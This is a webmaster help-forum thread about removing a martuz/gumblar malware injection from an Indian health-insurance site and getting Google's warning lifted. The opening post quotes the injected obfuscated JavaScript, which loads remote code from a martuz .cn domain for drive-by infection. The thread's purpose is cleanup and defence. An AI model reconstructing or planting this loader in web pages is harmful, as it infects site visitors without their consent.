That site has a martuz infection as evidenced by the Google diagnostic page:
http://www.google.com/safebrowsing/diagnostic?site=healthinsuranceindia.org
The malscript can be found on these 2 pages: mm_menu.js and scripts/slideshow.js
The code you’re looking is (spaces added for readers protection):
(f un cti on(KLdd){var LBEcd=‘var-20a-3d-22Scrip-74-45-6eg-69ne-22-2cb-3d-
22Vers-69on()-2b-22-2cj-3d-22-22-2cu-3dnavigat-6fr-2euser-41gent-3b-69f(-28u-
2eind-65xOf(-22C-68ro-6de-22)-3c-30-29-26-26-28-75-2eind-65xOf(-22Win-22-
29-3e-30)-26-26(u-2e-69n-64e-78-4ff(-22-4e-54-20-36-22)-3c-30)-26-26(d-
6fcument-2eco-6fk-69e-2eindex-4ff(-22m-69-65k-3d1-22)-3c0)-26-26-28-74y-
70eof(-7arv-7a-74s)-21-3dtypeof-28-22A-22)))-7bzrvzts-3d-22A-22-3be-76al(-22if
(w-69ndo-77-2e-22+a+-22-29j-3dj+-22+a+-22Maj-6fr-22+b+a+-22-4din-6f-72-22+-
62+a+-22Bui-6cd-22+b+-22j-3b-22-29-3bdoc-75ment-2e-77rite-28-22-3cscri-70t-
20-73rc-3d-2f-2fm-22+-22ar-74-75-7a-2ecn-2fv-69d-2f-3fid-3d-22+-6a+-22-3e-
3c-5c-2fsc-72ipt-3e-22-29-3b-7d’;var SoJ6=LBEcd.replace(KLdd,‘%’);var
UFS=un e s cape(SoJ6);eval(UFS)})(/\-/g);
Steps to follow:
1. Scan your PC with AVG and Malwarebytes. These 2 programs have been proven to find the infection that causes these website infections.
2. Download your site onto your PC, open the above files, delete the malscript and save the file.
3. Change your FTP password.
4. Upload the saved files to your website.
5. Use the Google webmaster tools to request a review of your site.
6. Find out from your hosting provider how to stop using FTP and use either SFTP, or FTPS. (post more questions in the forum if you don’t know how to do this)
7. Set up a non-administrator account on your PC and use that for all of your daily work. Only use the administrator account when you need to install software or a driver.
8. Update all software and operating systems (thank you Kaleh)
9. Disable javascript in Adobe Acrobat Reader. (Edit→Preferences→JavaScript, uncheck “Enable Acrobat JavaScript”) Many of the infections that martuz and gumblar try to exploit in their drive-by infections of visitors to your site are Adobe based. Protect yourself by disabling JavaScript in Adobe. You won’t miss it.
Let us know if you have any questions. Please post them here in this thread so that others may learn from your experience.
Thank you.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
Hi,
Thanx for your reply i have made all above things successfuly but yet google has not allwing my websites www.healthinsuranceindia.org to open from search engine. Getting This Site healthinsuranceindia.org May Harm Your Computer for all searching
Wht is wrong yet.
Plz reply me
Thanking you all in advance.
>The last time Google visited this site was on 2009-06-13
It doesn’t look like you have used your Google Webmaster Tools account to “Request a Review” since you made changes to your site.
Your site must be added and ownership verified in Webmaster Tools before you can access the “Request a Review” link.
Google Webmaster Tools
Google MalwareFAQ and screenshot for ‘Request a Review’
Since it doesn’t seem that the problem is cleared up yet, you may want to review the following resources related to [ gumblar martuz ] infections.
There is a variation in which there are many .php files containing malscript, in addition to .php files in the images folder that are contributing to the problem. Maybe this is something worth looking into.
A New Spin on martuz Infection (discusses the .php file issue)
Gumblar .cn Exploit – 12 Facts About This Injected Script
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
A Few More Facts About the Gumblar Attack From SophosLab and ScanSafe.
http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/
Martuz .cn – New Incarnation of the Gumblar Exploit. So What’s New?
http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/
Gumblar / Martuz Aftermath
http://blog.unmaskparasites.com/2009/05/26/gumblar-martuz-aftermath/#more-216
@rajeshumesh
Your Google Safe Browsing Diagnostic Report still shows “The last time Google visited this site was on 2009-06-26.”
The pages indexed and visible through searching for site:healthinsuranceindia .org show www versions of pages.
However, the Google Diagnostic report shows the non-www version when requesting the report for both the www and non-www version of the site.
Could you please let us know which version of your site you have listed in Webmaster Tools? www? or non-www?
Add the missing version, verify it and see if you get the red malware warning with the [ More Details ] link?
If you have the malware warning for the newly added version of the site, “Request a Review” for it, as well as for the other version that is already there.
It appears to me that Google has visited the site on:
2009-06-13
2009-06-25
2009-06-28
The site is still listed as suspicious and the Diagnostic Report references Martuz.
Could you tell us if you were able to follow any of the guidelines in the resources previously provided?
It appears that you have either Requested multiple reviews, or Google has, on its own, re-scanned your site and still sees problems.
It may be helpful for others to know what you have done, other than remove the original script that WeWatch identified.
But in webmaster tools thr is no warning page.
Yes I have make all changes accordance with guidelines in the resources provided.
Its also that i have made 2-3 request review review as well as reconsideration request from webmaster tool.
Plz tell me now how can i overcom from this warning maeeage from google. This website may harm your computer.
Hi,
Thanx for your reply.
I have added Display URLs as www.healthinsuranceindia.org in webmaster tools for prefferd domain.
red malware warning with the [ More Details ] link? show the following
Status of the last badware appeal for this site: A review for this site is still being processed. Please check back later.
Google users will see a warning page when they attempt to visit pages within this site. You can visit the Google Safe Browsing diagnostic page for your site for detailed information about the problems we found.
Please review StopBadware.org’s Security Tips for Websites and make any necessary changes to your site. When you have cleaned your site, you can request a review, and we’ll evaluate your site.
Request a review
Thr is no problen in webmaster tools at all.
Please help me wht can i do to make it ok.
Hoping for your prompt reply.
Thanx & Rgds
Rajesh Kumar
It looks like the last Request a Review has been processed. The last time Google visited this site was on 2009-06-29 and it is still listed as suspicious.
When you select [ www .healthinsuranceindia .org ] and [ healthinsuranceindia .org ] in Webmaster Tools, do you still see the red malware warning with the [ More Details ] link?
If so, could you check each one of them and let us know what the [ More Details ] screen says on each one now?
Edit: Have you asked your Hosting Provider for help with this?
Today for www.healthinsuranceindia.org we see:
Of the 124 pages we tested on the site over the past 90 days, 10 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-06-29, and the last time suspicious content was found on this site was on 2009-06-25.
It’s been visited on 6-29 and the last time suspicious content was found was on 6-25.
For healthinsuranceindia.org we see:
Of the 124 pages we tested on the site over the past 90 days, 10 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-06-29, and the last time suspicious content was found on this site was on 2009-06-25.
Malicious software includes 18 scripting exploit(s).
We’ve manually reviewed these sites and found nothing malicious.
Can you provide an answer to Kaleh’s question above?
Thank you.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
Hi
Thanx for your valuale response.
I am able to see only www.healthinsuranceindia.org in webmaster tools, yes i still see red malware warning with the [More Details] Link as follows
Status of the last badware appeal for this site: A review for this site is still being processed. Please check back later.
Google users will see a warning page when they attempt to visit pages within this site. You can visit the Google Safe Browsing diagnostic page for your site for detailed information about the problems we found.
Please review StopBadware.org’s Security Tips for Websites and make any necessary changes to your site. When you have cleaned your site, you can request a review, and we’ll evaluate your site.
Request a review
I have asked my hosting provider for help with this but have not got any help.
I certify that I have removed badware or badware links from my site, according to StopBadware.org’s Security Tips For Websites.
Comments about the review request (Optional):
Rgds
Rajesh
